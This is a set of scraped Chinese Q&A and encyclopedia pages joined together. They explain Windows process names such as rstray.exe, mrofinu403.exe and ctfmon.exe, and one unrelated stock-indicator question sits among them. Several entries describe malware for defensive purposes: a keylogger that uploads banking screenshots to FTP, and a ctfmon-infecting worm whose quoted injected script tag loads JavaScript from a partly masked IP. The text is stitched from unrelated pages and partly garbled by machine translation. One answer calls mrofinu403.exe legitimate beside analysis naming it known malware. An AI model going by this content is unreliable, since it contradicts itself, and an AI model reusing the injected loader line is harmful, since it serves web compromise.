ddzrpg.exe应用程序错误是什么意思_百度知道
ddzrpg.exe应用程序错误是什么意思
在退出QQ游戏斗地主时总是出现ddzrpg
我有更好的答案
按默认排序
你可以试一下用360或优化大师 修复一下！可以还原一下系统.cxzzl！建议你可以去这里学习一下://www！ 电脑维修班 有什么问题可以直接来联系我！如果不能解决问题
其他类似问题
181人觉得有用
应用程序错误的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁restray.exe -system是什么意思_百度知道
restray.exe -system是什么意思
提问者采纳
RSTray.exe正确的位置是X:\Rising\AntiSpyware\RSTray.exe(X指的是你安装的盘符)
RSTray.exe是瑞星卡卡上网安全助手6.0的实时监控程序。你结束它的进程后，右下角的一个蓝色小球程序就没了。RSTray.exe是负责监控的，基本每种杀毒软件都带着这种类似的监控程序，防止病毒木马侵入，提醒拦截恶意广告用的。
文件详细信息
文件名： rstray.exe
出品公司： Beijing Rising Technology Co.,...
产品名称： RSTray
版本号： 21.0.0.14
文件大小： 141936byte
上报时间：
MD5值： 53E3B0BD21FFCB95197D8
1.瑞星卡卡助手的任务栏驻留程序
2.一款通过电子邮件传播的网银盗号木马,该木马可以截获用户的键盘操作和用户在登陆网上银行时使用鼠标点击软键盘输入时的图片信息，截取成功后，将连接网络发送到指定的ftp空间。病毒检测
用户可以通过查看系统中是否存在如下目录结构来判断计算机是否已经被该病毒感染：
|-- clickshots [存放用户在登陆网银时的屏幕截图]
|-- logs [存放用户的键盘记录文件]
注：记录文件被上传到ftp后，本地文件将会被删除。
关闭进程&rstray.exe&
删除注册表项
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
&SCISound&=&\&C:\\WINDOWS\\rstray.exe\& /lanzateRunOnce&
删除目录：
%Windir%\msik
删除文件：
%Windir%\榨床侈缎侬等畴劝川滑rstray.exe
%Windir%\winhlp32.hlp[1]
提问者评价
其他类似问题
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁股市里的ddx,ddy,ddz,分别是什么意思？_百度知道
股市里的ddx,ddy,ddz,分别是什么意思？
ddx,ddy,ddz,各代表的是什么，如何用这些指标选股票？还有重点要看哪一个指标？麻烦各位高手们说的精简主要点。
ddy的相关知识
等待您来回答
您可能关注的推广
下载知道APP
随时随地咨询
出门在外也不愁mrofinu403.exe是什么意思？_百度知道
mrofinu403.exe是什么意思？
请问是什么意思？是合理进程吗？
是合理进程
其他类似问题
其他2条回答
AUTOMATED MALWARE PROFILE, ANALYSIS, REMOVAL AND SIGNATURE INFORMATION:自动化恶意档案，分析，搬迁和签名信息： DEFINITION OF: MROFINU403.EXE定义： mrofinu403.exe Safety Rating: Known malware, do not run安全评价：被称为恶意软件，不运行 Determination: Automatically determined using Prevx centralized heuristics决心：自动决心用Prevx以集中启发式 Protection: Prevx provides powerful security products that you can use to detect, remove and protect you from MROFINU403.EXE and safeguard your PC against viruses, trojans, worms, spyware, rootkits and adware保护： Prevx以提供强大的安全产品，您可以使用侦测，清除保护你不受mrofinu403.exe和保护PC免受病毒，特洛伊木马病毒，蠕虫，间谍软件， rootkit和广告软件 Why risk having spyware on your PC when it takes less than 2 minutes to thoroughly check it with Prevx CSI?为什么风险过间谍软件对个人电脑的时候，它不到2分钟，以彻底检查它与Prevx以CSI是谁？ And it is totally free. Click here to check your PC with Prevx CSI Now .它是完全免费， 按这里检查你的电脑与Prevx以倡议。 First seen: Dec 12 2007 (GMT)第一次看到： 日（格林威治标准时间） Last seen: Dec 12 2007 (GMT)上次登陆时间： 07年12月12日（格林威治标准时间） File Size: 39,936 bytes文件大小： 39936字节 MALWARE ASSESSMENT: PREVX 4 AXES OF EVIL METHODOLOGY 恶意评价说： Prevx以四轴线邪恶方法论 1. 1 。 COVERT ANALYSIS OF: MROFINU403.EXE隐蔽分析： mrofinu403.exe File Names Used: 29文件中使用的名称： 29 Paths Used: 6通路： 6 Common File Name: MROFINU403.EXE共同文件名： mrofinu403.exe Common Path: %WINDIR%\共同的路径： ％ windir ％ \ Vendor Information: No Vendor details specified供应商信息：没有卖方资料指明 Version Information: 0, 0, 0, 0版本信息： 0 ， 0 ， 0 ， 0 MROFINU403.EXE may use 29 or more path and file names, these are the most common: mrofinu403.exe可使用29个或更多的路径和文件名，这些都是最常见的： 1 :%TEMP%\TMP3F.TMP 1 ： ％温度％ \ tmp3f.tmp 2 :%TEMP%\TMP86.TMP 2 ： ％温度％ \ tmp86.tmp 3 :%WINDIR%\17PHOLMES1000106.EXE 3 ： ％ windir ％ \ 17pholmes1000106.exe 4 :%WINDIR%\17PHOLMES1148.EXE 4 ： ％ windir ％ \ 17pholmes1148.exe 5 :%WINDIR%\17PHOLMES1188.EXE 5 ： ％ windir ％ \ 17pholmes1188.exe 6 :%WINDIR%\17PHOLMES27.EXE 6 ： ％ windir ％ \ 17pholmes27.exe 7 :%WINDIR%\17PHOLMES572.EXE 7 ： ％ windir ％ \ 17pholmes572.exe 8 :%WINDIR%\17PHOLMES72.EXE 8 ： ％ windir ％ \ 17pholmes72.exe 9 :%WINDIR%\17PHOLMES77.EXE 9 ： ％ windir ％ \ 17pholmes77.exe 10:%WINDIR%\17PHOLMES922.EXE 10 ： ％ windir ％ \ 17pholmes922.exe 11:%WINDIR%\MROFINU1000106 .EXE 11 ： ％ windir ％ \ mrofinu1000106下生成 12:%WINDIR%\MROFINU1000106.EXE 12 ： ％ windir ％ \ mrofinu1000106.exe 13:%WINDIR%\MROFINU1000904.EXE 13 ： ％ windir ％ \ mrofinu1000904.exe 14:%WINDIR%\MROFINU11.EXE 14 ： ％ windir ％ \ mrofinu11.exe 15:%WINDIR%\MROFINU1148.EXE 15 ： ％ windir ％ \ mrofinu1148.exe File Name Structure: Normal档案名称结构：正常 File and Path Structure: Suspicious, unusually high number of file and path combinations文件和路径结构：可疑，异常高的数目文件和路径组合 2. 2 。 RELATIONSHIP ANALYSIS OF: MROFINU403.EXE相关分析： mrofinu403.exe Malicious Objects Created: 13 objects恶意物体创造： 13物体 Malicious Creators: 9恶意创作者： 9 Malware Run Keys: Creates registry run keys for known malware objects恶意软件运行键：创建注册开办的按键，可称为恶意软件对象 Self Persists: Yes, creates copies of itself自我坚持：是的，创造自己的副本 Antivirus Detection: No third party antivirus detection observed防毒侦测：没有第三方防毒侦测观察 Anti-Spyware Detection: No third party anti-spyware detection observed反间谍软件检测：没有第三方反间谍检测观察 3. 3 。 ACTIVITY ANALYSIS OF: MROFINU403.EXE活性分析： mrofinu403.exe The following behaviors have been observed for this object:下列行为已经观察到这个对象： Installs programs.安装程式。 Deletes programs.删除节目。 Invokes dll components.引用的DLL组件。 Creates Run Keys.创建运行键。 Runs other programs.运行其他程序。 Communicates with web sites using httpout protocols.与网站进行信息交流使用httpout议定书。 Creates registry entries.创建注册表条目。 Creates run keys for known malware.创建办按键，可称为恶意软件。 Creates known malware.创建已知恶意软件。 Creates copies of itself.创建自己的副本。
参考资料：
Google上找mrofinu403.exe就知道了
是合理进程
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁ctfmon.exe_百度百科
收藏 查看&ctfmon.exe本词条缺少信息栏、名片图，补充相关内容使词条更完整，还能快速升级，赶紧来吧！
ctfmon.exe是产品套装的一部分是有关的一个它可以选择用户文字输入程序和语言条这不是纯粹的系统程序但是如果终止它可能会导致不可知的问题另外ctfmon.exe可能被感染上而成为病毒程序
Alternative User Input Services
出品者Microsoft Corp
属于Microsoft Office Suite
后台程序是
使用网络否
硬件相关否
常见错误未知N/A
常见错误未知N/A
安全等级 (0-5 0
内存大小3664k
否软件类型国产软件
界面语言简体中文
软件大小19KB
文件类型.exe
运行环境Win2003,WinXP,win7,win8Win2000,Win9X[1]Ctfmon.exe 监视并为书写识别键盘翻译和其他中文可选用户输入方法技术提供文本输入服务支持
缺少ctfmon进程可能造成的影响
网络上有大量主张中止ctfmon进程的讨论但是在windows vistawindows 2008,windows 7中缺少ctfmon进程会引起的不正常行为常见的情况是用户忽然无法在输入法开启的情况下以按空格的方式输入可选字的第一个字的情况刚按下空格时输入法即被切换为英文
在这种情况下仍然可以用数字键来选择要输入的文字
解决办法是重新运 ctfmon 进程方法是
⒈点击开始选择运行
⒉输入ctfmon.exe
⒊点击运行按钮程序ctfmon.exeXP下系统默认情况下是随电脑开机而自动启动的Win7虽然也有此文件但并不会随系统自动启动[2]如果你设置了ctfmon.exe不随机自动启动进入系统后你的电脑中的图标即语言栏就不见了
要设置ctfmon.exe随机自动启动可以单击开始→运行→输入引号不要输入回车→打开使用程序窗口→选择启动页找到ctfmon项并在其前面打上钩按应用确定重启机器即可生效
家里系统是Windows7的不能像XP的选项操作如果ctfmon.exe并没有删除可工具栏选项上没有语言栏的选项的话打开操作面板\区域和语言\键盘和语言\更改键盘\语言栏将停靠于任务栏和在任务栏中显示其他语言栏图标勾上即可
如果在启动页找不到ctfmon项说明注册表中已将该项删除可以单击开始&运行&输入引号不要输入回车&打开定位到\Software\Microsoft\Windows\CurrentVersion\Run在窗口的右侧新建名字为ctfmon.exe的字符串值并将其值设置为C:\WINDOWS\system32\ctfmon.exe然后关闭注册表编辑器再执行前一步的操作即可
当语言栏消失且无法通过工具栏恢复时我们也可以从系统盘中的\WINDOWS\system32\ctfmon.exe找到ctfmon.exe文件并复制然后点击开始菜单找到启动选项右击启动打开然后把复制的ctfmon.exe文件粘贴到打开的启动文件夹中
如果不运行高级文字服务Ctfmon.exe 几乎不使用高级文字服务是 Ctfmon.exe 通过 TIP 控制的输入技术书写识别和输入方法编辑器
Ctfmon.exe 是负责控制中文可选用户输入方法技术的文件它启动语言栏组件在中并一直在后台运行甚至在退出 Office XP 程序之后也是如此每次启动 Windows 时它也会启动并一直在后台运行而与 Office XP 程序是否启动无关不能根据需要加载和中文可选用户输入方法系统在安装 Office XP 中文可选用户输入方法组件后Ctfmon.exe 在 Windows 会话期间继续在后台运行
如何解决关闭 ctfmon.exe后出现切换乱掉
注意以下的处理方法不能保证完全不会危害您的计算机请在采用之前认真考虑
如果你的win2000系统装了officeXP或以上版本它会在你和系统里留下一个ctfmon.exe文件并自动启动运行他困扰了无数的网友
首先我们来说一下它对用户界面和操作体验的一些影响
⒈ 无论打开什么窗口总会弹出一个工具体并且默认是中文输入
⒉ 它替换了原来的区域和设置并以一个文字服务的设置取而代之而且不能设置默认的输入法
⒊ 结束掉原来的工具进程并令他不能在开机时起动
⒋ 将自己放在开机时启动的程序列表中除非修改注册表否则无法去除
⒌ 像病毒一样有重生能力当你把ctfmon.exe删了以后他又会随着Office的启动而重新生成
⒍ 当你结束了ctfmon.exe后经常会出现切换乱掉的情况
第一步右击空白处点
第二步找到ctfmon.exe并终止它
第三步在系统目录下的system32目录下找到ctfmon.exe删除掉
第四步写一个最简单的api程序代码见附录编译后放到ctfmon.exe所在目录并更名为ctfmon.exe
第五步点击开始点击运行输入后点击确定
第六步重起计算机
⒈ 程序代码如下注意以下程序需要用编译
#include &windows.h&
int APIENTRY WinMain(HINSTANCE,HINSTANCE,LPTSTR,int)
{HANDLE m_hMutex = CreateMutex(NULL,TRUE,&ctfmon.exe&);
if(GetLastError() != ERROR_ALREADY_EⅪSTS)
while ⑴ Sleep(INFINITE);
return 0;}
⒉ 如果执行后发现word的无法正确使用解决办法如下
第一步打开word
第二步点击工具中的选项子菜单点击编辑选项卡
第三步清除控制处于活动状态的复选点击确定
第四步点击工具中语言子菜单中的设置语言项
第五步在列表中选择英语 美国点击确定
第六步关闭Word重启计算机
另外的解决方法开始－运行－输入－找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts－在下面的分支找到美国英语删除就行了如果使用了非微软拼音输入法那么就没必要随即开启ctfmon.exe程序让它占用有
限的资源比如习惯使用搜狗拼音输入法的用户如果安装了Office软件就会默认安装微软的拼音输入法对不使用它的用户完全可以设法关闭它具体的步骤是开始→控制面板→添加或删除程序→更改或删除程序→点选MOffice相关程序项→更改→选中添加或删除功能→继续→安装选项→点开Office 共享功能→点击微软拼音输入法不可用→继续由于安装Office程序的时候是默认安装微软输入法那么它的ctfmon.exe程序就会随机启动如要关闭它可以在注册表中删除随机启动项即可在运行中输入regedit 回车打开注册表定位到以下路径删除ctfmon键值即可HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe[1]如果你怀疑此进程有些不正常那么我们用下面的一些方法快速的察觉出Ctfmon.exe相关的病毒,若发现情况建议马上更新杀毒软件最新病毒库并对电脑全盘扫描
1如果发现Ctfmon.exe不在System32目录下
2如果此进程发现占用资源太多
3如果Win7系统运行了Ctfmon.exe2010年可牛安全中心截获到了一种替换系统ctfmon.exe的病毒随后ctfmon.exe病毒开始呈爆发式传播牢牢占据病毒排行榜的第一位
感染系统ctfmon.exe文件病毒爆发数百万网游玩家可能被盗号
该病毒以感染Windowsctfmon.exe作为跳板绕过及网游保护系统一旦受感染的被网络游戏加载到内存便会加载各种流行网游盗号特征是扩展名为drv盗取剑网三QQ地下城勇士CF等流行网游的账号同时也会使游戏过程中频繁
截止今天安全中心监测到有数百万网游玩家的电脑感染了ctfmon.exe病毒造成ctfmon.exe等丢失以及网游账号被盗
盗号伪装ctfmon.exe等伺机盗取网游账号
2009年开始感染成为新趋势替换病毒的出现意味着网游盗号产业进一步细化分工可以为了绕过和网游保护而制作一种独立病毒在过去为了侵入网游必须在中进行加载所以可以通过启动项检查发现是否有木马进入系统而像ctfmon.exe病毒这种通过感染ctfmon.exe文件从而将加载进网游进程的形势可以绕过大多数的检测这也是感染病毒 至今没有被主流杀软查杀的原因多数对潜行者病毒无法查杀或查杀后造成系统找不到ctfmon.exe文件导致运行网游时弹出丢失提示从百度谷歌等搜索引擎搜索量情况来看网友对ctfmon.exe文件的搜索量持续回升 也可以确定网友对只管查杀不管修复是如此无奈
安全中心建议剑网3QQ地下城与勇士穿越火线等网游的玩家立即运行可牛免费杀毒进行全盘扫描检测系统是否已经被ctfmon.exe病毒入侵
如果因其他杀软查杀导致电脑出现ctfmon.exe文件丢失可以使用ctfmon.exe可牛修复工具进行系统文件完美修复步骤1将Windows XP安装 光盘插入你的光驱然后依次点击开始→运行
步骤2在运行窗口中输入expand x\i386\rundll32.ex_c\windows\system32 \rundll32.exe命令并回车执行其中x为光驱的盘符
步骤3修复完毕后重新启动系统即可[3]
这是一个比以前少了很多但对局域网的影响会很大
该病毒运行后会指定的网络上下载病毒程序并且会搜索局域网内机器以进行尝试性连接
一旦连接成功则判断该机器弱口令是否有足够的权限有则向该远程机器发送恶意数据然后利用windows来下载程序予以执行.
⒈病毒运行后产生以下病毒文件
%WINDIR%\ SYSTEM32\tmipo.bat
%WINDIR%\ SYSTEM32\taimpo.txt
⒉添加病毒
名svchost对应路径%Documents and Settings%\Administrator\\ctfmon.exe
⒊病毒会触发taimpo.bat病毒文件用来关闭&360安全卫士&,使用户的安全性能降低.
⒋病毒会检测连接的远程机器当远程机器的登录是弱口令时则会对该机器进行攻击最后下载adi.vbs到用户机器上.
⒌遍历磁盘查找*.htm*.PHP*.ASP等网页文件开始感染插入一段JS代码
script language=javascript src=http://218.**.**.248/qq.js
这段可能会被用作下载更多的利用攻击传播利用下载器种植木马是目前偷东西惯用的手法
怕麻烦直接去下载
⒈删除病毒生成的三个文件可使用清理专家的完成操作
%WINDIR%\ SYSTEM32\tmipo.bat %WINDIR%缺省是c:\windows目录
%WINDIR%\ SYSTEM32\taimpo.txt
%Documents and Settings%\Administrator\桌面\ctfmon.exe伪装成的程序名
⒉使用的修复功能将病毒添加的注册表删除
⒈最最重要的是给系统打登录系统一定要使用口令就算是电脑只有自己一个人用也需要安全的登录口令口令不能太简单以免被远程攻击工具猜解因为只要电脑接入互联网就能给以机会.
其它方案基本是相通的不在缀述
中毒后的解决办法
将升级到最近版本进行查杀如果查杀完毕后发现无法正常使用的情况请下载附件中的文件将其解压后复制到C:\Windows\system32\ 文件夹即可解决
备注如果 ctfmon.exe 位于在目录 C:\Windows下那么威胁危险度是 70%文件大小是 2,811,732
占总出现比率 37%20,062 字节50,670 字节18,353 字节95,744 字节是不可见的这是个不知名的文件存放于 Windows 目录这个不是 Windows 没有进程的相关资料ctfmon.exe 是有能力可以 隐藏自身监控[4]ctfmon.exe 5.1.
　　　　名字
Windows XP Home Edition,Deutsch
　　　　文件道路
C:\WINDOWS\system32\dllcache \ ctfmon.exe
13.312 字节
　　　　CRC32:
E5EE 2F47 00B6 A85F 0D45 A18C 67DA 500F
1D1B F316 C6D3 E91F 8975 60FC E77F 038A FB72 56FF
　　　　公司名称
Microsoft Corporation
CTF Loader
文件操作系统
Windows NT,Windows 2000,Windows XP,Windows 2003
Dynamic Link Library (DLL)
(C)Microsoft Corporation. All rights reserved.
原始的文件名
CTFMON.EXE
Microsoft Windows Operating System
新手上路我有疑问投诉建议参考资料 查看